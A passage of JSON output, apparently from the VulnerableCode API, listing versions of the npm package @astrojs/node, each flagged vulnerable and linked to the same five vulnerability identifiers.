            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-server-islands-20240703133809"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843073?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-server-islands-20240709194928",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-server-islands-20240709194928"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843074?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.0-toolbar-absolute-paths-20240126155246",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.0-toolbar-absolute-paths-20240126155246"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843075?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.2-next.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.2-next.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843076?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.0.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.0.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843077?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.1.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.1.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843078?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.1.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.1.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843079?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.1.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.1.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843080?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.1.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.1.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843081?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.1.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.1.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843082?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.1.5",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.1.5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843083?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.1.6",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.1.6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843084?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.2.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.2.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843085?format=api",
            "purl": "pkg:npm/%40astrojs/node@0.2.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@0.2.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843086?format=api",
            "purl": "pkg:npm/%40astrojs/node@1.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@1.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843087?format=api",
            "purl": "pkg:npm/%40astrojs/node@1.0.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@1.0.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843088?format=api",
            "purl": "pkg:npm/%40astrojs/node@1.1.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@1.1.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843089?format=api",
            "purl": "pkg:npm/%40astrojs/node@2.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@2.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843090?format=api",
            "purl": "pkg:npm/%40astrojs/node@2.0.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@2.0.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843091?format=api",
            "purl": "pkg:npm/%40astrojs/node@2.0.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@2.0.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843092?format=api",
            "purl": "pkg:npm/%40astrojs/node@3.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@3.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843093?format=api",
            "purl": "pkg:npm/%40astrojs/node@3.1.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@3.1.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843094?format=api",
            "purl": "pkg:npm/%40astrojs/node@3.1.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@3.1.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843095?format=api",
            "purl": "pkg:npm/%40astrojs/node@4.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@4.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843096?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.0.0-beta.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.0-beta.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843097?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.0.0-beta.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.0-beta.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843098?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.0.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843099?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.0.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843100?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.0.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843101?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.0.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843102?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.0.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.0.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843103?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.1.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.1.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843104?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.1.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.1.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843105?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.1.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.1.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843106?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.1.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.1.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843107?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.1.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.1.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843108?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.2.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.2.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843109?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.3.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.3.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843110?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.3.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.3.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843111?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.3.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.3.2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843112?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.3.3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.3.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843113?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.3.4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.3.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843114?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.3.5",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.3.5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843115?format=api",
            "purl": "pkg:npm/%40astrojs/node@5.3.6",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@5.3.6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843116?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.0.0-beta.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
                    "vulnerability": "VCID-qcs7-nt67-7qe5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540astrojs/node@6.0.0-beta.0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/843117?format=api",
            "purl": "pkg:npm/%40astrojs/node@6.0.0-rc.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-c6g3-td4y-gbgj"
                },
                {
                    "vulnerability": "VCID-ecmk-efnj-nbfq"
                },
                {
                    "vulnerability": "VCID-jt7q-nwep-wbfb"
                },
                {
                    "vulnerability": "VCID-mhk4-vf4t-47g7"
                },
                {
